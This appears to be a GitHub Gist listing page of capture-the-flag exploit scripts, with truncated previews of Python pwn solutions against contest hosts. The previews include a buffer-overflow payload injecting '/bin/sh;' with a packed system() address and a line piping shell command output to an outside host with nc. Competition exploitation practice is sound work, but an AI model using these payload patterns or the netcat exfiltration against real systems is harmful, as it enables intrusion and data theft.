Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

import socket
import time
import re
from Pwning import *
pl = Payload()
def get_socket(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
#!/usr/bin/python
from Pwning import *
# customs when binary doesn't have nx eable or mprotect/nmap is on got table
# from Shellcode import *
# edit Templet with your own Name
class CGC(Payload):
def __init__(self):
Payload.__init__(self)
@peternguyen93
peternguyen93 / whitehat2015_10_pwn300.py
Created July 27, 2015 13:29
white hat contest 10 pwn300
#!/usr/bin/python
from Pwn import *
# from Shellcode import *
p = Pwn(mode=1,host='lab33.wargame.whitehat.vn',port=10300)
def exploit():
payload = '<su>' + 'A'*127 + '<to>' + '/bin/sh;' + 'C'*120
payload+= p.pack(0x400A40)[:3] # system
#!/usr/bin/python
from Pwn import *
p = Pwn(host='54.165.223.128',port=2555)
# p = Pwn()
def create_contact(name,description):
p.read_until('>>>')
p.write('1\n')
#!/usr/bin/python
from Pwn import *
# p = Pwn(mode=1,port=12012)
p = Pwn(mode=1,host='54.175.183.202',port=12012)
username = 'blankwall'
password = ';rpywx~YYYBBBBB~:::::::=KP`'
#!/usr/bin/python
import socket
import re
from capstone import *
from Pwn import *
import sys
# p = Pwn(mode=1,host='52.20.10.244',port=12351)
def disas(code):
asm = ''
#!/usr/bin/python
from Pwn import *
import re
def add_skeleton(skeleton):
d = p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
p.write('m\n')
p.read_until('so... what do you say to mr skeletal?\n')
#!/usr/bin/python
from Pwn import *
p = Pwn(host='54.152.37.20',port=24242)
# p = Pwn(port=24242)
def exploit():
shell = raw_input('> ')
back_connect = shell + ' | nc 128.199.171.28 8001'
#!/usr/bin/python
from Pwn import *
p = Pwn(mode=1,host='lab02.matesctf.org',port=4001)
def add_node(nid,content):
p.read_until('Please choose an option :')
p.write('1\n')
p.read_until('Please give me an id:')
#!/usr/bin/python
from Pwn import *
import string
p = Pwn(mode=1,host='lab04.matesctf.org',port=4003)
def find_index_flag():
p.read_until('Remember: send us your hex-encoded flag.\r\n')
last = 0xff # -2